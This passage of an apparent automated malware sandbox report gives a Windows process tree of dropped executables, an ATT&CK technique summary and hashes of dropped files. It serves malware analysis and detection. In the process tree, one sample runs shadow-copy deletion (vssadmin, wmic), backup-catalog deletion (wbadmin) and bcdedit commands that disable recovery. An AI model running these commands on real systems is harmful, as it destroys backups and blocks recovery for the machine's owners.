                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:5720
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                              1⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              PID:5376
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:4412
                                                                            • C:\Users\Admin\AppData\Local\Temp\EBF2.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\EBF2.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:4312
                                                                            • C:\Users\Admin\AppData\Local\Temp\F569.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\F569.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:4952
                                                                            • C:\Users\Admin\AppData\Local\Temp\FEFF.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\FEFF.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:2196
                                                                            • C:\Users\Admin\AppData\Local\Temp\C9D.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\C9D.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:4980
                                                                              • C:\Users\Admin\AppData\Local\Temp\339802969.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\339802969.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:5468
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  3⤵
                                                                                    PID:5600
                                                                                • C:\Users\Admin\AppData\Local\Temp\1230843919.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1230843919.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:3912
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    3⤵
                                                                                      PID:5204
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                      3⤵
                                                                                        PID:4760
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1355.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\1355.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4600
                                                                                  • C:\Users\Admin\AppData\Local\Temp\12D7.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\12D7.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Enumerates connected drives
                                                                                    PID:5268
                                                                                    • C:\Users\Admin\AppData\Local\Temp\12D7.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\12D7.exe" -agent 0
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Program Files directory
                                                                                      • Drops file in Windows directory
                                                                                      PID:4652
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                      2⤵
                                                                                        PID:4732
                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                          wmic shadowcopy delete
                                                                                          3⤵
                                                                                            PID:5596
                                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                                            vssadmin delete shadows /all /quiet
                                                                                            3⤵
                                                                                            • Interacts with shadow copies
                                                                                            PID:2164
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                          2⤵
                                                                                            PID:3708
                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                              vssadmin delete shadows /all /quiet
                                                                                              3⤵
                                                                                              • Interacts with shadow copies
                                                                                              PID:5240
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                            2⤵
                                                                                              PID:5948
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                              2⤵
                                                                                                PID:5348
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                2⤵
                                                                                                  PID:4468
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                  2⤵
                                                                                                    PID:4648
                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                      wmic shadowcopy delete
                                                                                                      3⤵
                                                                                                        PID:5588
                                                                                                    • C:\Windows\SysWOW64\notepad.exe
                                                                                                      notepad.exe
                                                                                                      2⤵
                                                                                                        PID:5160
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:4656
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:4340
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:4908
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:4896
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5628
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:1868
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:3964
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1148
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:4744
                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                  1⤵
                                                                                                                    PID:5560
                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                    1⤵
                                                                                                                      PID:4256
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:1096
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                        1⤵
                                                                                                                          PID:1000
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          PID:4772
                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 4772 -s 3048
                                                                                                                            2⤵
                                                                                                                            • Program crash
                                                                                                                            PID:5060
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                            PID:4868

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                          Persistence

                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                          1
                                                                                                                          T1060

                                                                                                                          BITS Jobs

                                                                                                                          1
                                                                                                                          T1197

                                                                                                                          Defense Evasion

                                                                                                                          File Deletion

                                                                                                                          2
                                                                                                                          T1107

                                                                                                                          Modify Registry

                                                                                                                          3
                                                                                                                          T1112

                                                                                                                          BITS Jobs

                                                                                                                          1
                                                                                                                          T1197

                                                                                                                          Install Root Certificate

                                                                                                                          1
                                                                                                                          T1130

                                                                                                                          Credential Access

                                                                                                                          Credentials in Files

                                                                                                                          3
                                                                                                                          T1081

                                                                                                                          Discovery

                                                                                                                          Software Discovery

                                                                                                                          1
                                                                                                                          T1518

                                                                                                                          Query Registry

                                                                                                                          5
                                                                                                                          T1012

                                                                                                                          System Information Discovery

                                                                                                                          6
                                                                                                                          T1082

                                                                                                                          Security Software Discovery

                                                                                                                          1
                                                                                                                          T1063

                                                                                                                          Peripheral Device Discovery

                                                                                                                          2
                                                                                                                          T1120

                                                                                                                          Remote System Discovery

                                                                                                                          1
                                                                                                                          T1018

                                                                                                                          Collection

                                                                                                                          Data from Local System

                                                                                                                          3
                                                                                                                          T1005

                                                                                                                          Command and Control

                                                                                                                          Web Service

                                                                                                                          1
                                                                                                                          T1102

                                                                                                                          Impact

                                                                                                                          Inhibit System Recovery

                                                                                                                          2
                                                                                                                          T1490

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                            MD5

                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                            SHA1

                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                            SHA256

                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                            SHA512

                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                            MD5

                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                            SHA1

                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                            SHA256

                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                            SHA512

                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                          • C:\Program Files\Windows Portable Devices\SJOSVGXZEI\ultramediaburner.exe
                                                                                                                            MD5

                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                            SHA1

                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                            SHA256

                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                            SHA512

                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                          • C:\Program Files\Windows Portable Devices\SJOSVGXZEI\ultramediaburner.exe
                                                                                                                            MD5

                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                            SHA1

                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                            SHA256

                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                            SHA512

                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                          • C:\Program Files\install.dat
                                                                                                                            MD5

                                                                                                                            31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                            SHA1

                                                                                                                            c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                            SHA256

                                                                                                                            b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                            SHA512

                                                                                                                            3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                          • C:\Program Files\install.dll
                                                                                                                            MD5

                                                                                                                            fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                            SHA1

                                                                                                                            6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                            SHA256

                                                                                                                            9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                            SHA512

                                                                                                                            0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4
                                                                                                                            MD5

                                                                                                                            d1b1f562e42dd37c408c0a3c7ccfe189

                                                                                                                            SHA1

                                                                                                                            c01e61a5c5f44fb038228b7e542f6a8d7c8c283d

                                                                                                                            SHA256

                                                                                                                            7f468f04fe5a1b0616685f157a4285090b6ed3858d4cd9efe915aaeed83c158e

                                                                                                                            SHA512

                                                                                                                            404d279fabd4886008e47e9138f799cf398f0aa4c8556192d6e45dbcde99eac2cd65c47b9e0b88bd6d3a6529818f6048a23a197a913fb917b19dffbbd5d75850

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\6F5AC3E88228423792AAC8245F6E27FA
                                                                                                                            MD5

                                                                                                                            8eddf904a00fd2973e32f80890cbe29e

                                                                                                                            SHA1

                                                                                                                            dd71c31a141815d3c922734eeed78abaa93ac242

                                                                                                                            SHA256

                                                                                                                            ef36635790e419ad9a4c0e0494f47c6b24210e05f8eb9d5b7476aa3604a1326a

                                                                                                                            SHA512

                                                                                                                            b8e16e47b7b972984c1c9dff1f574708614bff51e3c2b8ab1a23f591fa9387012319718c4b71849cbf7b9f53415de1633545acd050ccf0b834afb7c199274332

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_93E4B2BA79A897B3100CCB27F2D3BF4F
                                                                                                                            MD5

                                                                                                                            44c3b25bcda40306dde012694fa7d019

                                                                                                                            SHA1

                                                                                                                            38c2ff411a5d65d84bc1bf52a247d0a8fbd55755

                                                                                                                            SHA256

                                                                                                                            5aec65dad756838135869226d5ffa603e4c555d8a8e2cc21fee9c5db4414202b

                                                                                                                            SHA512

                                                                                                                            665b32fb14be34915847737784ccc65360f22cd0f4a8c47f6811539df6718a757568d8470ff511964bd829b1fe87bcdd89dd3c5fc82e8269618a2147cc55fef9

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62
                                                                                                                            MD5

                                                                                                                            8a6cf5cff04f5b930a7ceff6e48e383c

                                                                                                                            SHA1

                                                                                                                            80cce2b90e10e3fb4afb63acf6805ef4c6868229

                                                                                                                            SHA256

                                                                                                                            38cfa8c08b902392a8d9640c3358507661e24cf3163e5878995bfe2351300bc6

                                                                                                                            SHA512

                                                                                                                            16707329172a1bec3d8bcf88c0e705859fc0bff6c216f7ddcc08f8f3bbe42fc0888a11223098fe651f7c5e4e50241fa2fcba29d4eb135da43893c0e9988da222

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894
                                                                                                                            MD5

                                                                                                                            212fda975791d8383386df113b6b8b4b

                                                                                                                            SHA1

                                                                                                                            412cf7bcf0dfa09ae9364eef042906174bfa24a0

                                                                                                                            SHA256

                                                                                                                            35c7031feccd3c42f6ce376e952f3d6320275eddd7a6540598b4a010e157f629

                                                                                                                            SHA512

                                                                                                                            b7999ab8a46f01f47fa19b70afe851d41dd0edeec002abee941a237852e912cc008b826e65af0d7475dae5b9a8d3b8726b7b0e46bdf3e36e74cf213e7e9ddea6

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\FC5A820A001B41D68902E051F36A5282_753069DDEDBE64CDBB05DF3C7C1F1C15
                                                                                                                            MD5

                                                                                                                            378820f407050393cb894a6b8a2861c5

                                                                                                                            SHA1

                                                                                                                            38052f9fedee0f0bd2717bd7910707e8baf04f7b

                                                                                                                            SHA256

                                                                                                                            60cfe14e98e57b832631e7e33d591f2d9a294844c8e9cffb53a61ad0c52c9e57

                                                                                                                            SHA512

                                                                                                                            1fa54211501499c92d36cfbbf964ea6c687c6ffe5e2a25bd44dcf900e20a5d9c271a3c6da7d572811e367e6efb13c5a67b17cabf5388de5183bd722b2a0e3697

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4
                                                                                                                            MD5

                                                                                                                            ffd4d817a0c542f00225571242452c95

                                                                                                                            SHA1

                                                                                                                            71af66611b42892f4825ea565c7be01acbfb4d01

                                                                                                                            SHA256

                                                                                                                            62db3811dbec6f3f36a3ebc6421e53ca86c0bda8420a34d49e09d0853350b38e

                                                                                                                            SHA512

                                                                                                                            801e1e37090b220dc66a4a6f28d8f8e2627e781519e7f4831c32ff87263e83d514a60b4497f60dcd5505985081c136aed7b7e8b24e2c2809e1d422beac594a6c

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\6F5AC3E88228423792AAC8245F6E27FA
                                                                                                                            MD5

                                                                                                                            496090ca89a74f23ffea88fd7fc0e672

                                                                                                                            SHA1

                                                                                                                            32f3aebc6cf80efd0b18e40c6bd569d0a74cfe22

                                                                                                                            SHA256

                                                                                                                            668d22648441be5f39c4d1f44c7e4670aeb29db1bd21ae2013eff7dc95409341

                                                                                                                            SHA512

                                                                                                                            e7d74d2de09d909779c76d75c4bed26ad68ffb7466630365a17760edf5a34e199f249157dbdc1aa40acb6e464a9a244830cf8610d1c1e370307fdb1ce6e37e2b

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_93E4B2BA79A897B3100CCB27F2D3BF4F
                                                                                                                            MD5

                                                                                                                            4f041bd026ffd498ae2fed13d5d3cbac

                                                                                                                            SHA1

                                                                                                                            bf4ebb4424f81ec64c50ab24988891926d6b4a94

                                                                                                                            SHA256

                                                                                                                            877f6e692fd837ff1cf55814e74be5518455c762925872c835523e6b4c501a4e

                                                                                                                            SHA512

                                                                                                                            1e547ca3aafa55fb037c2877a99aeb459a4eabd9201d11dc8db9db41354215c9cf2452976f411bbcc8b89545c46b675d4d48a626426e251f7092f7a5b9b650f8

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62
                                                                                                                            MD5

                                                                                                                            df58b7da1182d84f5250fe1d6d22da03

                                                                                                                            SHA1

                                                                                                                            3c00da7fe392ef4f5bef20c19f746acbb0cbdeb0

                                                                                                                            SHA256

                                                                                                                            bb54cf0a37ca6370a49fc8f00f22e0ce910fb0badaecfc72205fa21e1de9d39b

                                                                                                                            SHA512

                                                                                                                            d1becdfa24720726d57c0f446b4d9af67e861235d13495203204944b4ba7512c63b995fee7837ad65b6c77c6b90141df745653833fa8ed23f69d5c44eeaa44db

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894
                                                                                                                            MD5

                                                                                                                            67488d2411e603e276d813cba4139ec6

                                                                                                                            SHA1

                                                                                                                            b81ce45df996c8ee8072ae900c54fb25601e2575

                                                                                                                            SHA256

                                                                                                                            f2823ccf102a0b34da3b902632d65adce2092e9065cc14fc7028f258d7414961

                                                                                                                            SHA512

                                                                                                                            f5123946cfb39641d53ad2ddf682b5731f88e6fcb25b6fcf8a3b22a78d7e8a18030272b840d9fd6c6c8232f3c5505ec450ba71291901d7ba94bb3bf34a66e07b

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\FC5A820A001B41D68902E051F36A5282_753069DDEDBE64CDBB05DF3C7C1F1C15
                                                                                                                            MD5

                                                                                                                            22cf4fcb9c3ebc5d86362c40ee6b174a

                                                                                                                            SHA1

                                                                                                                            c65ed13131d11002c03a806f4b4eb85132b14ea0

                                                                                                                            SHA256

                                                                                                                            f62876cec8f7bc2f1e91f2ba3cd9a0388cfb7e5f7967a2ebee3e0a231c34f83c

                                                                                                                            SHA512

                                                                                                                            da08ba132e8dbf54e3b90348a1f86d57a4db6e81f991c3bdb3cdbd396b0316c1dfb6f3e80cd07deb6dafc0cf2af4e30ce5dde167e64bdcb49984e436e1331633

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\31ptd5av.wct\SunLabsPlayer.exe
                                                                                                                            MD5

                                                                                                                            cbce93a50ef1465334499828576ea11e

                                                                                                                            SHA1

                                                                                                                            30904b183f67884f63c79377b3c03a3d1cd124b2

                                                                                                                            SHA256

                                                                                                                            c35edc940e9974d15591341b4ae40a374f94a5a546be23fdd2b376a6b006840d

                                                                                                                            SHA512

                                                                                                                            eb5768051bd0dbe17cf177bad0468f85c555794aeec852b1008b6a53521ee81f4992ade7822492affa594140145357b5090da677b42138d7ed6777e7eca6f1a8

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\31ptd5av.wct\SunLabsPlayer.exe
                                                                                                                            MD5

                                                                                                                            cbce93a50ef1465334499828576ea11e

                                                                                                                            SHA1

                                                                                                                            30904b183f67884f63c79377b3c03a3d1cd124b2

                                                                                                                            SHA256

                                                                                                                            c35edc940e9974d15591341b4ae40a374f94a5a546be23fdd2b376a6b006840d

                                                                                                                            SHA512

                                                                                                                            eb5768051bd0dbe17cf177bad0468f85c555794aeec852b1008b6a53521ee81f4992ade7822492affa594140145357b5090da677b42138d7ed6777e7eca6f1a8

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\50-f245c-e9a-255ac-26951ddc7e58e\Bakibiduzhe.exe
                                                                                                                            MD5

                                                                                                                            18e49540637bccc9b3a7ca3d48cae223

                                                                                                                            SHA1

                                                                                                                            b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                            SHA256

                                                                                                                            698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                            SHA512

                                                                                                                            a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\50-f245c-e9a-255ac-26951ddc7e58e\Bakibiduzhe.exe
                                                                                                                            MD5

                                                                                                                            18e49540637bccc9b3a7ca3d48cae223

                                                                                                                            SHA1

                                                                                                                            b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                            SHA256

                                                                                                                            698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                            SHA512

                                                                                                                            a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\50-f245c-e9a-255ac-26951ddc7e58e\Bakibiduzhe.exe.config
                                                                                                                            MD5

                                                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                                                            SHA1

                                                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                            SHA256

                                                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                            SHA512

                                                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8b-d1b98-444-e5794-627c13d21deb5\Hylihymaso.exe
                                                                                                                            MD5

                                                                                                                            2e91d25073151415f8c39de2262cbba8

                                                                                                                            SHA1

                                                                                                                            32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                            SHA256

                                                                                                                            0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                            SHA512

                                                                                                                            306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8b-d1b98-444-e5794-627c13d21deb5\Hylihymaso.exe
                                                                                                                            MD5

                                                                                                                            2e91d25073151415f8c39de2262cbba8

                                                                                                                            SHA1

                                                                                                                            32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                            SHA256

                                                                                                                            0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                            SHA512

                                                                                                                            306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8b-d1b98-444-e5794-627c13d21deb5\Hylihymaso.exe.config
                                                                                                                            MD5

                                                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                                                            SHA1

                                                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                            SHA256

                                                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                            SHA512

                                                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8b-d1b98-444-e5794-627c13d21deb5\Kenessey.txt
                                                                                                                            MD5

                                                                                                                            97384261b8bbf966df16e5ad509922db

                                                                                                                            SHA1

                                                                                                                            2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                            SHA256

                                                                                                                            9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                            SHA512

                                                                                                                            b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\KTzqalu1FT.exe
                                                                                                                            MD5

                                                                                                                            dac476eb95c28c5cc52eabaf262ac97d

                                                                                                                            SHA1

                                                                                                                            b8f879f009decfa380dca47e24ce875f5a805d23

                                                                                                                            SHA256

                                                                                                                            4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                                                                            SHA512

                                                                                                                            276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

